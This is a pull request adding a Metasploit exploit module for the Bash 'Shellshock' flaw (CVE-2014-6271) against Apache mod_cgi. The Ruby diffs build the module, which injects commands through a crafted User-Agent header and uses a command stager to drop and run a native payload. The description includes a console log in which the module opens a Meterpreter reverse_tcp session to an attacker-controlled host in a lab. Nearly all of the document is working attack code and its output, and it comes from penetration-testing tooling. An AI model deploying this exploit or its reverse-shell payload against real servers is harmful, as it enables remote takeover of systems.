### PR TITLE
Add exploit module for CVE-2014-6271 (Bash exploit)  

### DIFF
--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -68,6 +68,12 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
+    end
+
     execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'])
   end
 

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -41,6 +42,13 @@ class Metasploit4 < Msf::Exploit::Remote
               'Arch'            => ARCH_X86,
               'CmdStagerFlavor' => [ :echo, :printf ]
             }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
           ]
         ],
       'DefaultTarget' => 0,
@@ -52,7 +60,7 @@ class Metasploit4 < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
       OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
-      OptString.new('RPATH', [true, 'Target PATH for binaries uses by the CmdStager', '/bin']),
+      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
       OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
     ], self.class)
   end
@@ -74,12 +82,22 @@ class Metasploit4 < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
     end
 
-    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'])
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
+
+    # A last chance after the cmdstager
+    # Trying to make it generic
+    unless session_created?
+      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
+    end
   end
 
   def execute_command(cmd, opts)
     cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
-    cmd.gsub!('rm', "#{datastore['RPATH']}/rm")
+
+    if cmd =~ />>/ && first_redirection?
+      cmd.sub!('>>', '>')
+    end
+
     req(cmd)
   end
 
@@ -94,5 +112,14 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def marker
     @marker ||= rand_text_alphanumeric(rand(42) + 1)
+  end
+
+  def first_redirection?
+    unless @first_redirection && @first_redirection == false
+      @first_redirection = false
+      return true
+    end
+
+    false
   end
 end

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -83,7 +83,7 @@ class Metasploit4 < Msf::Exploit::Remote
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
         'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
-      }, 5)
+      }, datastore['TIMEOUT'])
   end
 
   def marker

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -94,10 +94,6 @@ class Metasploit4 < Msf::Exploit::Remote
   def execute_command(cmd, opts)
     cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
 
-    if cmd =~ />>/ && first_redirection?
-      cmd.sub!('>>', '>')
-    end
-
     req(cmd)
   end
 
@@ -112,14 +108,5 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def marker
     @marker ||= rand_text_alphanumeric(rand(42) + 1)
-  end
-
-  def first_redirection?
-    unless @first_redirection && @first_redirection == false
-      @first_redirection = false
-      return true
-    end
-
-    false
   end
 end

--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
+      'Description' => %q{
+        This module exploits a code injection in specially crafted environment
+        variables in Bash, specifically targeting Apache mod_cgi scripts through
+        the HTTP_USER_AGENT variable.
+      },
+      'Author' => [
+        'Stephane Chazelas', # Vulnerability discovery
+        'wvu', # Original Metasploit aux module
+        'juan vazquez' # Allow wvu's module to get native sessions
+      ],
+      'References' => [
+        ['CVE', '2014-6271'],
+        ['URL', 'https://access.redhat.com/articles/1200223'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+      ],
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 24 2014',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to CGI script']),
+      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
+      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
+      OptString.new('RPATH', [true, 'Target PATH for binaries uses by the CmdStager', '/bin']),
+      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
+    ], self.class)
+  end
+
+  def check
+    res = req("echo #{marker}")
+
+    if res && res.body.include?(marker * 3)
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'])
+  end
+
+  def execute_command(cmd, opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+    cmd.gsub!('rm', "#{datastore['RPATH']}/rm")
+    req(cmd)
+  end
+
+  def req(cmd)
+    send_request_cgi(
+      {
+        'method' => datastore['METHOD'],
+        'uri' => normalize_uri(target_uri.path.to_s),
+        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+      }, 5)
+  end
+
+  def marker
+    @marker ||= rand_text_alphanumeric(rand(42) + 1)
+  end
+end


### PR DESCRIPTION
Nothing super impressive, just get the awesome's @wvu-r7 's module and build the exploit version, because sessions are funny =)

```
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /test.php
TARGETURI => /test.php
msf exploit(apache_mod_cgi_bash_env_exec) > check
[+] 172.16.158.144:80 - The target is vulnerable.
msf exploit(apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(apache_mod_cgi_bash_env_exec) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(apache_mod_cgi_bash_env_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.158.144
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.144:44539) at 2014-09-25 13:29:42 -0500
[*] Command Stager progress - 101.18% done (861/851 bytes)

meterpreter > getuid
eServer username: uid=48, gid=48, euid=48, egid=48, suid=48, sgid=48
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.144 - Meterpreter session 1 closed.  Reason: User exit
```
